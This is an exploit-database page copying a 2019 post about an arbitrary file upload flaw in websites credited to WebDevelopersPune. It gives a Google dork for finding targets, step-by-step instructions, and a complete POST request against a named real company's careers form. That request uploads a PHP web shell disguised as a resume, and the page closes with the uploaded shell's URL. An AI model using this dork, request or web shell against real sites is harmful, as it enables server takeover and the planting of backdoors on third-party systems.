Advertisement






Design by WebDevelopersPune Arbitrary File Upload Vulnerability

CVE Category Price Severity
N/A CWE-434 Unknown High
Author Risk Exploitation Type Date
WebDevelopersPune High Remote 2019-05-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050058

Below is a copy:

Design by WebDevelopersPune Arbitrary File Upload Vulnerability
##############################################################
#  Title :  Design by WebDevelopersPune Arbitrary File Upload Vulnerability
#  Author : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
#  Date : /06/05/2019
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( Backbox )
#  Vendor : http://www.webdeveloperspune.com
#  Dork : intext:"Design by WebDevelopersPune"
###############################################################



 [ 1 ]  Search in google   :     intext:"Design by WebDevelopersPune"  "careers"

 [ 2 ]  Choose URL then  upload your php shell 

 [ 3 ]  http://localhost:80/uploadcv/ [ PHP BACKDOOR ]

Example :    

--------------------------------------------------------------------------

         http://www.electropotentinfotech.com/careers.html


--------------- POST REQUEST ------------------------------------

POST /careers_mail.php HTTP/1.1
Host: www.electropotentinfotech.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.electropotentinfotech.com/careers.html
Cookie: _ga=GA1.2.1600898550.1557157559; _gid=GA1.2.1741193570.1557157559; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10837544701235829337682045570
Content-Length: 1872

-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="fname"

omg
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="lname"

omg
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presentd"

ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presente"

ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="yer"

2
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="mnth"

6
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presentl"

ff
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="resume"; filename="up.PhP2"
Content-Type: application/octet-stream

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }
}echo '<html><head><title>Upload files...Bassemdz IN</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="discription"

ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="submit"


-----------------------------10837544701235829337682045570--




---------------------------------------------------------------------------------------------------------------


   [ + ]  http://www.electropotentinfotech.com/uploadcv/190506092639up.PhP2


---------------------------------------------------------------------------------------------------------------


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.